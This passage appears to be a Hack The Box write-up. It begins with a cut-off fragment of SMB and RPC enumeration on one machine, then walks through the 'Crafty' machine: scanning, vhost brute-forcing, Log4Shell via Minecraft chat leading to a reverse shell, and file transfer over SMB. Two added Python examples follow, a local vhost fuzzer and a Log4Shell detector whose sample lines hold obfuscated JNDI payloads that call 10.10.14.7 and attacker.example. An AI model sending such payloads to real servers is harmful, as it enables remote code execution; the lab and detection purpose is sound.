^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'
# The null session itself is accepted, but listing shares is denied; smbmap does not handle that and crashes on the boolean it gets back. smbclient below shows the same result more cleanly.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbclient -L //10.129.116.140 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.116.140 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# crackmapexec smb 10.129.116.140
SMB 10.129.116.140 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
Trying to connect to MSRPC
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# rpcclient -U '' -N 10.129.116.140
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
Looking for public vulnerabilities
Summary
Crafty
Machine description
Crafty is an easy-difficulty Windows machine featuring the exploitation of a `Minecraft` server. Enumerating the version of the server reveals that it is vulnerable to pre-authentication Remote Code Execution (RCE), by abusing `Log4j Injection`. After obtaining a reverse shell on the target, enumerating the filesystem reveals that the administrator composed a Java-based `Minecraft` plugin, which when reverse engineered reveals `rcon` credentials. Those credentials are leveraged with the `RunAs` utility to gain Administrative access, compromising the system.
Difficulty
Easy
Information gathering
Detailed TCP scan
┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap -sT -sV -sC -O -p80,25565 $ip1 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 12:20 EDT
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Few ports are exposed: a web service on IIS and a Minecraft game server, so the web service gets priority. Note also that nmap did not follow the redirect to http://crafty.htb; from experience, every hostname that shows up like this should go into the hosts file, which is essential.
Script vulnerability scan
┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap --script=vuln -p80,25565 10.10.11.249 -oA nmapscan/tcpvuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 23:56 EDT
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 23:57 (0:00:01 remaining)
Stats: 0:03:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 00:00 (0:00:01 remaining)
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.12s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 495.65 seconds
Nothing of value.
First look at the web
Visiting the home page reveals another URL, which also needs to go into the hosts file:
Visiting the new URL, the site looks practically identical to the original. Exploring the original site's features, every click just redirects to http://crafty.htb/coming-soon.
Viewing the source with F12 turns up nothing suspicious at first glance either.
Directory brute-forcing
Next, directory brute-forcing, using several common tools to make sure the results are complete; dirb, gobuster and feroxbuster all find nothing of value.
DNS brute-forcing
Since a subdomain was already seen, but it serves the same content as the main domain, it is reasonable to guess that other subdomains exist. Brute-forcing them only turns up the subdomain we already know.
Virtual host brute-forcing (video hint: the "small" details of subdomain brute-forcing)
Subdomain brute-forcing found nothing and the other attempts did no better. The 红队笔记 video gave the missing idea: the earlier approach was incomplete because, besides DNS subdomain brute-forcing, one can also brute-force virtual hosts. When one server hosts several websites or applications (a multi-tenant setup, common in real environments), the other virtual hosts can be discovered this way, and in the URL they look exactly like subdomains. So gobuster has to be switched to vhost mode. The two modes work differently, so the parameters differ slightly: the wordlist holds individual labels rather than full hostnames, hence --append-domain, and since the known hostname is reached through a redirect, -r can be added to follow redirects:
┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# gobuster vhost -u http://10.10.11.249 --domain crafty.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -r
The dns mode resolves each candidate subdomain through the DNS server on port 53; the vhost mode instead sends each candidate in the HTTP Host header and decides from the response (status code and size) measured against a baseline for a name that cannot exist. So even when no port 53 is exposed, vhost mode can still find the names a web server answers to.
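To make the difference between the two modes concrete, here is the vhost logic as an added example written for this writeup (not code from the page or from gobuster), exercised against a small local HTTP server constructed for the demo. The server answers with a distinct page only when the Host header is dev.crafty.htb and serves a default page for any other name, which mirrors a server hosting several sites on one IP; the hostname dev.crafty.htb and the four-word wordlist are assumptions for the demo, not findings from the target.

```python
"""Virtual-host discovery through the Host header, exercised against a local server.

Added example for this writeup, not code from the page or from gobuster. The
HTTP server below is constructed so the technique can run offline: it answers
with a distinct page only when the Host header is dev.crafty.htb and serves a
default page for any other name, like a server hosting several sites on one IP.
The hostname dev.crafty.htb and the wordlist are assumptions for the demo.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

VHOST_PAGES = {"dev.crafty.htb": b"<html><body>dev build, staging only</body></html>"}
DEFAULT_PAGE = b"<html><body>Crafty, coming soon</body></html>"


class HostAwareHandler(BaseHTTPRequestHandler):
    """Serve a page chosen by the Host header, like name-based virtual hosting."""

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = VHOST_PAGES.get(host, DEFAULT_PAGE)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):  # silence the per-request log lines
        pass


def start_server():
    """Bind an ephemeral port on loopback and serve in a background thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), HostAwareHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(ip, port, host):
    """One GET / with a spoofed Host header; the response fingerprint is (status, length)."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    try:
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def fuzz_vhosts(ip, port, domain, words):
    """The gobuster vhost idea, with no DNS involved: take a baseline with a
    name that cannot exist, then send each <word>.<domain> (the --append-domain
    form) and report the names whose (status, length) differs from the baseline."""
    baseline = probe(ip, port, f"definitely-not-here-8b1f.{domain}")
    found = {}
    for word in words:
        candidate = f"{word}.{domain}"
        fingerprint = probe(ip, port, candidate)
        if fingerprint != baseline:
            found[candidate] = fingerprint
    return found


if __name__ == "__main__":
    server = start_server()
    hits = fuzz_vhosts("127.0.0.1", server.server_address[1], "crafty.htb",
                       ["www", "dev", "mail", "admin"])
    print(hits)
    server.shutdown()
```

Two things carry over to real targets. The baseline should be taken with more than one random name, because some servers vary the default page slightly per request; and when the default page embeds the requested hostname, every candidate differs from the baseline by a few bytes of length, which is what gobuster's --exclude-length option is for.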
A small efficiency tip for gobuster (video supplement)
gobuster's completion subcommand changes how the current shell interacts with gobuster: it improves the experience noticeably and saves memorising parameters and the tedious routine of running --help whenever you forget what comes next, by suggesting the options step by step. This is especially useful in real engagements, and other large tools such as nmap offer something similar.
Usage:
First check which shell is in use:
┌──(root㉿kali)-[/home/kali]
└─# echo $SHELL
/usr/bin/zsh
The following command generates the completion script for the shell:
It has to be appended to the user's zsh configuration file ~/.zshrc and then loaded:
After that, typing gobuster and pressing tab shows the command help directly instead of the default shell file completion, and as the command is built up the suggestions narrow step by step, offering more complete help; it feels as if the command being written follows your train of thought more precisely.
Probing unfamiliar ports (video supplement)
Take port 25565 here: anyone who knows Minecraft recognises it at once as the default port for joining a server, but if you don't, the following approaches help:
- open it in a browser
- fetch it with curl
- connect with nc and watch what happens
The browser shows a decoding error but leaks some information, for instance that the service is written in Java.
curl -L follows redirects and gives the same result. nc gets no response at all: the Minecraft protocol is client-first, the server stays silent until it receives a handshake packet, which is also why nmap's minecraft probe has to send one before it can report the version.
Exploring the Minecraft server
Switch the OpenVPN connection to Windows and set up the Windows hosts file the same way. From experience, joining a Minecraft server usually requires the local client version and some of the mods to match the server, so first connect with any version to read off the server version (nmap had already reported it above):
So the connection has to be made with a local 1.16.5 client.
Looking for a public PoC
Searching with the following keywords finds what we need:
Article 1 gives a clear exploitation method.
Article 2 explains the Log4Shell mechanism in detail, with a small experiment as demonstration.
The principle is easy to follow; the hard part is thinking of this vulnerability in the first place:
Getting a foothold
When exploiting, note that the target is Windows while poc.py defaults to a Linux shell, so the reverse-shell command has to be changed to one that works on Windows:
Then, inside Minecraft, type the generated JNDI-format payload string into the chat box. The server logs the chat message through log4j, which evaluates the ${jndi:...} lookup and reaches out to our listener, and we get a shell.
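The defensive counterpart of that chat payload is worth seeing as well: a server log or chat filter that only looks for the literal string `${jndi:` misses the common obfuscations, in which the letters are produced by nested lookups such as `${lower:J}` or `${::-j}`. The following added example (written for this writeup, not code from the page or from any PoC) folds those lookups first and then reports the JNDI scheme and host; the chat lines and the addresses in them are constructed placeholders, and the resolver covers only the lookup forms listed in its comments, so it is a detection aid rather than a reimplementation of log4j.

```python
"""Flag Log4Shell-style JNDI lookups in chat or log lines, undoing the usual
lookup obfuscation first.

Added example for this writeup, the defensive counterpart of the chat payload
above; it is not code from the page or from any PoC. SAMPLE_CHAT is constructed
and the addresses in it are placeholders. The resolver handles only the lookup
forms noted in the comments, which are the ones seen in common obfuscations,
so it is a detection aid rather than a reimplementation of log4j.
"""
import re

# One innermost lookup (no nested ${ } inside) that we know how to fold:
#   ${lower:X} / ${upper:X}                          -> case-changed X
#   ${prefix:-default}, e.g. ${::-j} or ${env:NOPE:-j} -> default
# For the default form we assume the lookup fails (the worst case for a
# defender), which is what makes ${env:NOPE:-j} collapse to the letter j.
FOLDABLE = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*?:-([^${}]*))\}", re.I)

# After folding, the dangerous lookup is plain: ${jndi:<scheme>://<host>...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}:\s]+)", re.I)


def _fold(m):
    if m.group(1):
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return m.group(3)


def normalize(text, max_rounds=50):
    """Repeatedly fold innermost lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        folded = FOLDABLE.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text


def find_jndi(text):
    """Return [(scheme, host)] for each JNDI lookup present after normalisation."""
    return [(s.lower(), h) for s, h in JNDI.findall(normalize(text))]


# Constructed chat excerpt: one benign lookup-looking line, three payload variants.
SAMPLE_CHAT = [
    "<steve> gg everyone",
    "<griefer> ${jndi:ldap://10.10.14.7:1389/a}",
    "<griefer> ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://10.10.14.7:1389/a}",
    "<griefer> ${${lower:J}${upper:n}di:rmi://attacker.example/x}",
    "<builder> price is ${env:PRICE:-5} coins",
]


def scan(lines):
    """Index and findings for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found))
    return hits


if __name__ == "__main__":
    for i, found in scan(SAMPLE_CHAT):
        print(f"line {i}: {found}  <- {SAMPLE_CHAT[i]}")
```

The folding step is the part that matters: the second and third griefer lines contain no literal "jndi" at all, yet both normalise to the same `${jndi:...}` form as the first, while the builder's `${env:PRICE:-5}` folds to a harmless "5" and is not reported.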
Using rlwrap to improve the reverse shell's interactivity (video supplement)
With the shell made interactive, switch the reverse shell to powershell; commands such as gci then collect the wanted information quickly, for example:
Enumeration before privilege escalation
Nothing of value turns up in the current user's directory or in the inetpub web root on C:, only two .jar files worth pulling out for further analysis. But the target has no Python installed, and with my limited experience that was the only transfer method I could think of; I did not know which other ways there were to get the files out.
Transferring files off the target with impacket-smbserver (video supplement)
Even without Python, since the target is Windows we can use the impacket tool to stand up an SMB server and transfer the files over an SMB share:
Don't forget to clean up the traces of the connection afterwards!